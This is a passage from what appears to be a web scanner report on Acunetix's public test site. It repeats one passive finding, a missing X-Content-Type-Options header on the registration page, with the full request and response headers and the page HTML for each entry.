| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- 